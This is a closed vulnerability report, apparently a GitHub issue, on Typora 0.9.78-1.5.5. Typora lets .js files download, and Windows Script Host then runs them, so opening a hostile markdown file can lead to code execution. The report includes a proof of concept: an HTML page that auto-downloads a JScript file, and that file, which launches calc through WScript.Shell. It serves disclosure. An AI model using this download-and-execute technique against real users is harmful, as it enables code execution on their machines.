Closed
Description
Description
Although typora filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
Version: 0.9.78-1.5.5(latest)
Attachment
poc.html
<!-- auto download !-->
<html>
<script>
var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'poc.js';
a.click();
</script>
</html>
<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>poc.js
var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
WScript.Echo("You were hacked.")
WScript.Quit();Metadata
Metadata
Assignees
Labels
No labels
